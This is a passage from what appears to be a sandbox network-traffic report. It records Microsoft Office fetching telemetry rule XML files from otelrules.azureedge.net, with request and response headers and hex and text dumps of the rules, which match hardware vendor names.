                                                  2024-11-27 17:09:36 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192.168.2.64971413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:35 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:36 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2980
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170935Z-174f7845968swgbqhC1EWRmnb40000000xfg000000000y9e
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:36 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192.168.2.64971613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:35 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB56D3AFB"
                                                  x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170935Z-174f7845968nxc96hC1EWRspw80000000wvg00000000r3ng
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:36 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192.168.2.64971213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:35 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 450
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                  ETag: "0x8DC582BD4C869AE"
                                                  x-ms-request-id: 4faee4dc-001e-00a2-5b66-40d4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170935Z-174f7845968qj8jrhC1EWRh41s0000000x1g00000000v5b1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:36 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.64971513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:35 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:36 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2160
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA3B95D81"
                                                  x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170936Z-174f7845968jrjrxhC1EWRmmrs0000000xd00000000078cw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:36 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.64971913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:38 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                  ETag: "0x8DC582B9964B277"
                                                  x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170938Z-174f7845968ljs8phC1EWRe6en0000000x1000000000hn9n
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:38 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.64972013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:38 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                  ETag: "0x8DC582B9F6F3512"
                                                  x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170938Z-174f7845968g6hv8hC1EWR1v2n000000053000000000p38y
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.64972213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:38 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 632
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6E3779E"
                                                  x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170938Z-174f784596886s2bhC1EWR743w0000000x7000000000gzbh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:38 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.64972113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:38 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                  ETag: "0x8DC582BB10C598B"
                                                  x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170938Z-174f7845968qj8jrhC1EWRh41s0000000x5g00000000c09x
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.64972313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:38 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:38 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:38 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 467
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6C038BC"
                                                  x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170938Z-174f78459685726chC1EWRsnbg0000000x7g00000000hhpa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:38 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.64972613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBAD04B7B"
                                                  x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170940Z-174f7845968kdththC1EWRzvxn00000009p0000000004n3n
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:40 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.64972713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB344914B"
                                                  x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170940Z-174f7845968j6t2phC1EWRcfe80000000xfg000000001142
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
